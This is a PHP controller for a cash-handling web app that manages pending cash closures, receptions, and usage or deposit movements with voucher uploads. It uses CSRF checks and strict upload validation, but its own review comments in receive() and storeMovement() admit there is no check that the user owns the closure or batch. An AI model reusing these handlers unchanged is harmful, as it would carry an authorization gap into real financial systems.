Viewing: CashPendingController.php
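<?php

/**
 * Pending-cash workflow: lists closures awaiting delivery, registers the
 * reception of a closure, and records USO/DEPOSITO movements (optionally
 * with an attached voucher) against a pending batch.
 *
 * State-changing actions require a POST request, a valid CSRF token
 * (validateCsrf() is inherited from BaseController) and a logged-in user.
 * Every redirect() call is followed by `return`/`exit` so the handler does
 * not keep executing if redirect() itself does not terminate the request.
 */
class CashPendingController extends BaseController
{
    /** Closure statuses that appear on the pending list. */
    private const LISTED_STATUSES = ['GENERATED', 'DELIVERED', 'PARTIALLY_USED', 'PENDING_DEPOSIT'];

    /** Movement types accepted by storeMovement(). */
    private const MOVEMENT_TYPES = ['USO', 'DEPOSITO'];

    /**
     * Voucher upload policy. The upload directory lives under public/ and is
     * served by the web server, so only non-executable document/image types
     * are accepted, and the extension is cross-checked with the file content.
     */
    private const ALLOWED_EXTENSIONS = ['pdf', 'jpg', 'jpeg', 'png', 'gif', 'webp'];
    private const ALLOWED_MIME_TYPES = [
        'application/pdf',
        'image/jpeg',
        'image/png',
        'image/gif',
        'image/webp',
    ];

    /**
     * Returns the session CSRF token, creating one when the session has none.
     */
    private function ensureCsrf(): string
    {
        if (empty($_SESSION['csrf'])) {
            $_SESSION['csrf'] = bin2hex(random_bytes(32));
        }

        return $_SESSION['csrf'];
    }

    /**
     * Returns the current user record, or redirects to the login page and
     * terminates the request when nobody is logged in.
     */
    private function requireUser(): array
    {
        $user = getCurrentUser();
        if (!$user) {
            redirect('login');
            exit;
        }

        return $user;
    }

    /**
     * Sets an error flash message and redirects back to the pending list.
     * Callers must `return` right after calling this.
     */
    private function failToIndex(string $message): void
    {
        setFlashMessage('error', $message);
        redirect('cashpending.index');
    }

    /**
     * Stores an uploaded voucher under public/uploads/pending.
     *
     * @param array $file one entry of $_FILES
     * @return string|null path relative to public/, or null when no file was submitted
     * @throws RuntimeException when the file type is not allowed or the file cannot be stored
     */
    private function handleDocumentUpload(array $file): ?string
    {
        if (empty($file['tmp_name']) || (int)($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return null;
        }

        // The extension comes from the client-supplied name; restrict it to the
        // allowlist so nothing executable can land in the web-served directory.
        $extension = strtolower(pathinfo((string)($file['name'] ?? ''), PATHINFO_EXTENSION));
        if (!in_array($extension, self::ALLOWED_EXTENSIONS, true)) {
            throw new RuntimeException('Tipo de archivo no permitido.');
        }

        // Verify the actual content type, not just the name.
        $detectedMime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
        if (!in_array($detectedMime, self::ALLOWED_MIME_TYPES, true)) {
            throw new RuntimeException('Tipo de archivo no permitido.');
        }

        $targetDir = dirname(__DIR__) . '/public/uploads/pending';
        // The second is_dir() covers a concurrent request creating the directory first.
        if (!is_dir($targetDir) && !mkdir($targetDir, 0775, true) && !is_dir($targetDir)) {
            throw new RuntimeException('No se pudo guardar el archivo adjunto.');
        }

        // Server-generated name: timestamp plus random suffix, never the client name.
        $filename = 'pending_' . date('Ymd_His') . '_' . bin2hex(random_bytes(4)) . '.' . $extension;
        $destination = $targetDir . '/' . $filename;

        if (!move_uploaded_file($file['tmp_name'], $destination)) {
            throw new RuntimeException('No se pudo guardar el archivo adjunto.');
        }

        return 'uploads/pending/' . $filename;
    }

    /**
     * Renders the pending list for the current user (all closures for ADMIN,
     * otherwise only the ones assigned to the user) with summary metrics.
     *
     * The view reads $user, $csrf, $items, $metrics and $openClosureId.
     */
    public function index(): void
    {
        $user = $this->requireUser();
        $csrf = $this->ensureCsrf();

        // ADMIN sees every closure; any other role only its own deliveries.
        $deliveryUserId = ($user['role'] ?? '') === 'ADMIN' ? null : (int)($user['id'] ?? 0);
        $closures = CashClosure::listForDelivery($deliveryUserId, self::LISTED_STATUSES);
        $openId = (int)($_GET['open'] ?? 0);

        $items = [];
        $metrics = [
            'to_receive' => 0,
            'in_progress' => 0,
            'pending_amount' => 0.0,
            'ready_to_deposit' => 0,
        ];

        foreach ($closures as $closure) {
            $batch = CashPendingBatch::findByClosure((int)$closure['id']);
            $movements = $batch ? CashPendingMovement::forBatch((int)$batch['id']) : [];
            $status = $closure['status'] ?? 'GENERATED';

            if (!$batch && $status === 'GENERATED') {
                $metrics['to_receive']++;
            } elseif (in_array($status, ['DELIVERED', 'PARTIALLY_USED'], true)) {
                $metrics['in_progress']++;
            } elseif ($status === 'PENDING_DEPOSIT') {
                $metrics['ready_to_deposit']++;
            }

            $metrics['pending_amount'] += (float)($closure['pending_amount'] ?? 0);

            $items[] = [
                'closure' => $closure,
                'batch' => $batch,
                'movements' => $movements,
            ];
        }

        $openClosureId = $openId;
        require __DIR__ . '/../views/caja/pending.php';
    }

    /**
     * Registers the reception of a closure by the current user: marks it
     * DELIVERED, sets its pending amount and creates/loads its pending batch,
     * all inside one transaction.
     */
    public function receive(): void
    {
        if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
            redirect('cashpending.index');
            return;
        }
        if (!$this->validateCsrf()) {
            http_response_code(400);
            echo 'CSRF inválido';
            return;
        }

        $user = $this->requireUser();
        $closureId = (int)($_POST['closure_id'] ?? 0);
        $notes = trim((string)($_POST['notes'] ?? ''));

        if ($closureId <= 0) {
            $this->failToIndex('Cierre inválido.');
            return;
        }

        $closure = CashClosure::findById($closureId);
        if (!$closure) {
            $this->failToIndex('El cierre indicado no existe.');
            return;
        }
        if (!in_array($closure['status'], ['GENERATED', 'DELIVERED'], true)) {
            $this->failToIndex('Este cierre ya fue procesado.');
            return;
        }

        $amount = (float)($closure['delivered_amount'] ?? 0);
        if ($amount <= 0) {
            $this->failToIndex('El cierre no tiene un monto a entregar.');
            return;
        }

        // NOTE(review): no check here that this user may receive this particular
        // closure; confirm whether listForDelivery()/the view is the only gate.
        $pdo = (new Database())->getConnection();
        try {
            $pdo->beginTransaction();

            CashClosure::updateFields($closureId, [
                'delivery_user_id' => (int)$user['id'],
                'pending_amount' => $amount,
                'status' => 'DELIVERED',
                // Keep the existing notes when the form submitted none.
                'notes' => $notes !== '' ? $notes : $closure['notes'],
            ], $pdo);

            CashPendingBatch::findOrCreateForClosure(
                $closureId,
                (int)$user['id'],
                $amount,
                $notes !== '' ? $notes : null,
                $pdo
            );

            $pdo->commit();
            setFlashMessage('success', 'Se registró la recepción del cierre #' . $closure['consecutive'] . '.');
        } catch (Throwable $e) {
            if ($pdo->inTransaction()) {
                $pdo->rollBack();
            }
            setFlashMessage('error', 'No se pudo registrar la recepción: ' . $e->getMessage());
        }

        redirect('cashpending.index');
    }

    /**
     * Records a USO or DEPOSITO movement against a pending batch. A DEPOSITO
     * must carry a voucher file; a USO may optionally attach one.
     */
    public function storeMovement(): void
    {
        if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
            redirect('cashpending.index');
            return;
        }
        if (!$this->validateCsrf()) {
            http_response_code(400);
            echo 'CSRF inválido';
            return;
        }

        $user = $this->requireUser();
        $batchId = (int)($_POST['batch_id'] ?? 0);
        $movementType = strtoupper(trim((string)($_POST['movement_type'] ?? '')));
        $reference = trim((string)($_POST['reference'] ?? ''));
        $description = trim((string)($_POST['description'] ?? ''));
        $amount = (float)($_POST['amount'] ?? 0);

        // A movement must be positive and finite; "1e999" casts to INF.
        $validAmount = is_finite($amount) && $amount > 0;
        if ($batchId <= 0 || !$validAmount || !in_array($movementType, self::MOVEMENT_TYPES, true)) {
            $this->failToIndex('Datos del movimiento inválidos.');
            return;
        }

        $batch = CashPendingBatch::find($batchId);
        if (!$batch) {
            $this->failToIndex('No se encontró el lote pendiente.');
            return;
        }

        $closure = CashClosure::findById((int)$batch['closure_id']);
        if (!$closure) {
            $this->failToIndex('Cierre asociado no disponible.');
            return;
        }

        // NOTE(review): no ownership check between $user and $batch/$closure
        // here; confirm applyMovement() enforces it.
        try {
            $documentPath = null;
            $hasFile = !empty($_FILES['document']) && !empty($_FILES['document']['tmp_name']);
            if ($hasFile) {
                $documentPath = $this->handleDocumentUpload($_FILES['document']);
            }
            // A deposit without a stored voucher (none sent, or upload error) is rejected.
            if ($movementType === 'DEPOSITO' && $documentPath === null) {
                throw new RuntimeException('Debes adjuntar el baucher del depósito.');
            }

            CashPendingBatch::applyMovement(
                $batchId,
                $movementType,
                $amount,
                [
                    // Compare against '' rather than truthiness so a reference of "0" is kept.
                    'reference' => $reference !== '' ? $reference : null,
                    'description' => $description !== '' ? $description : null,
                    'document_path' => $documentPath,
                    'user_id' => (int)$user['id'],
                ]
            );

            $message = $movementType === 'USO'
                ? 'Uso registrado correctamente.'
                : 'Depósito registrado y baucher guardado.';
            setFlashMessage('success', $message);
        } catch (Throwable $e) {
            setFlashMessage('error', 'No se pudo registrar el movimiento: ' . $e->getMessage());
        }

        redirect('cashpending.index');
    }
}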